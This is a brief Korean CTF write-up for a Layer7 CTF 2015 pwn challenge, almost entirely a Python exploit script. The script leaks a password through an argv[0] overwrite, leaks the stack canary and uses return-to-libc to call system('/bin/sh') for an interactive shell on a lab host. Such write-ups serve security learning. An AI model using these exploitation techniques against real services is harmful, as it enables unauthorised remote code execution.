Layer7 CTF 2015 - Spil..Spli....SPPPPPIILL

별로 어렵지는 않았지만 argv[0]주소를 찾기 위해 브루트 포싱을 했더니 조금 귀찮았던 문제.

xinetd 데몬으로 돌아가고 있어서 쉘따기가 참 쉬웠다.

from hackutil import *
from socket import *
from time import *
from telnetlib import *
 
HOST = '192.168.136.153'
PORT = 9880
 
#=======================================
system = 0x08048610
freeadd = 0x0804b0E0
#=======================================
 
banner()
 
print "===================[ Phase 1 : Password leak ]=================="
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
s.recv(1024)
s.send('A'*0x11d+p32(0x0804b060)+'\n')
sleep(0.1)
data = s.recv(1024)
passwd = data[data.find("***: ")+5:data.find(" terminated")]
print "[*] Found Password : "+passwd
 
print "============[ Phase 2 : Ready to RTL, Canary leak ]============="
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
 
s.recv(1024)
s.send(passwd+'\n')
s.recv(1024)
s.recv(1024)
s.send('2\n')
sleep(0.2)
s.recv(1024)
s.send('1\n')
sleep(0.2)
s.recv(1024)
s.send('4\n')
sleep(0.2)
s.recv(1024)
s.send('A'*0x15+'\n')
sleep(0.2)
s.recv(1024)
s.send('/bin/sh\x00\n')
print '[*] Inject "/bin/sh"'
sleep(0.2)
s.recv(1024)
s.send('Mini\n')
sleep(0.2)
data = s.recv(1024)
data.encode('hex')
canary = data[data.find('AAA\n')+4:data.find('Wow')]
if(len(canary)<4):
    canary = "\x00"*(4-len(canary)) + canary
canary = up32(canary)[0]
print "[*] Found canary : "+hex(canary)
 
print "==================[ Phase 3 : Attack with RTL ]================="
 
s.send('3\n')
sleep(0.2)
s.recv(1024)
payload = 'A'*0xd9+p32(canary)+"A"*0xC+p32(system)+"AAAA"+p32(freeadd)
print "[*] Length of Payload : "+str(len(payload))
s.send(payload+'\n')
print "[*] Payload Injected"
sleep(1)
s.recv(1024)
 
s.send('0\n')
sleep(0.2)
s.recv(1024)
 
s.send('1\n')
sleep(0.2)
s.recv(1024)
 
print "===================[ Phase 4 : Got the shell ]=================="
 
t = Telnet()
t.sock = s
t.interact()